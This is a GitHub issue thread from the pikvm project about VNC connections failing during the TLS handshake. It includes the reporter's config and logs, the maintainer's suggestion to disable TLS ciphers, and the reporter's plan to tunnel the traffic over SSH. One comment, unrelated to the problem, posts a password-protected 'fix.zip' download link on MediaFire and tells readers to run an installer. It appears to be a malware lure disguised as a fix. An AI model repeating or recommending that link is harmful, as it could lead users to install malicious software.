pikvm/pikvm #1392: VNC not working

DIGist, 2024-08-28:
Unable to connect to VNC on Pikvm model 3.
Configured /etc/kvmd/override.yaml:
vnc:
     # See https://github.com/pikvm/pikvm/blob/master/pages/vnc.md
     keymap: /usr/share/kvmd/keymaps/en-us
     auth:
         vncauth:
             enabled: true # Enable auth via /etc/kvmd/vncpasswd

I want to use the vncauth to connect as it allows me to work with another project that works with vnc control.
Connecting with tigervnc gives me a h264 context error
Attempting to connect with standard vnc fails with this in the kvmd-vnc log:

> Aug 28 09:12:49 pikvm1 kvmd-vnc[568]: kvmd.apps.vnc.server              INFO --- [::ffff:192.168.144.99]:43428 [entry]: Connected client
> Aug 28 09:12:49 pikvm1 kvmd-vnc[568]: kvmd.apps.vnc.rfb                 INFO --- [::ffff:192.168.144.99]:43428 [entry]: Starting client tasks ...
> Aug 28 09:12:49 pikvm1 kvmd-vnc[568]: kvmd.apps.vnc.rfb                 INFO --- [::ffff:192.168.144.99]:43428 [main]: Using RFB version 3.8
> Aug 28 09:12:49 pikvm1 kvmd-vnc[568]: kvmd.apps.vnc.rfb                 INFO --- [::ffff:192.168.144.99]:43428 [main]: Using VeNCrypt security type
> Aug 28 09:12:49 pikvm1 kvmd-vnc[568]: kvmd.apps.vnc.rfb                 INFO --- [::ffff:192.168.144.99]:43428 [main]: Using VeNCrypt/X509Plain auth type
> Aug 28 09:12:50 pikvm1 kvmd-vnc[568]: kvmd.apps.vnc.rfb                 INFO --- [::ffff:192.168.144.99]:43428 [main]: Starting TLS (valid) ...
> Aug 28 09:12:50 pikvm1 kvmd-vnc[568]: kvmd.apps.vnc.rfb                 INFO --- [::ffff:192.168.144.99]:43428 [main]: Gone: Can't start TLS: ConnectionResetError:
> Aug 28 09:12:50 pikvm1 kvmd-vnc[568]: kvmd.apps.vnc.rfb                 INFO --- [::ffff:192.168.144.99]:43428 [kvmd]: Cancelling subtask ...
> Aug 28 09:12:50 pikvm1 kvmd-vnc[568]: kvmd.apps.vnc.rfb                 INFO --- [::ffff:192.168.144.99]:43428 [streamer]: Cancelling subtask ...
> Aug 28 09:12:50 pikvm1 kvmd-vnc[568]: kvmd.apps.vnc.rfb                 INFO --- [::ffff:192.168.144.99]:43428 [fb_sender]: Cancelling subtask ...
> Aug 28 09:12:50 pikvm1 kvmd-vnc[568]: kvmd.apps.vnc.rfb                 INFO --- [::ffff:192.168.144.99]:43428 [entry]: Connection closed

**To Reproduce**
Steps to reproduce the behavior, like:
1. Enable vnc in /etc/kvmd/override.yaml
2. restart
3. attempt to connect with plain vnc
4. See failure and log in 'journalctl -u kvmd-vnc'

**Expected behavior**
successful standard vnc connection to pikvm

**Desktop (please complete the following information):**
 - OS: Linux
 - Browser chrome
 - Version latest
 - VNC client tigervnc, remmina, connections, multivnc

**PiKVM info:**
  - Raspberry Pi board version : RPi 4
  - PiKVM platform : Model 3
  - KVMD version: 
kvmd 4.8-1
kvmd-fan 0.31-1
kvmd-oled 0.27-1
kvmd-platform-v3-hdmi-rpi4 4.8-1
kvmd-webterm 0.50-1
  - uStreamer version: ustreamer 6.13-1
  - Linux kernel: Linux pikvm1 6.6.45-3-rpi #1 SMP Fri Aug 23 19:13:06 UTC 2024 armv7l GNU/Linux

HeinousAgenda38, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

mdevaev, 2024-08-28:
> Connecting with tigervnc gives me a h264 context error

Which error exactly?

mdevaev, 2024-08-28:
It seems your client can't handle SSL encryption. You can try o disable it at all:

```
vnc:
    server:
        tls:
            ciphers: ""
```

> standard vncauth

It is not safe by design.

DIGist, 2024-08-29:
Sure thing! Thanks for the assist.
I really appreciate the default for vnc requiring encryption as I know basic VNC doesn't have encryption to protect the traffic.  In my specific use case, the tool that will be connecting to kvmd-vnc will be going over an SSH tunnel for encryption and the 5900 port will be blocked from traffic from everything except localhost.

closed 2024-08-29 by DIGist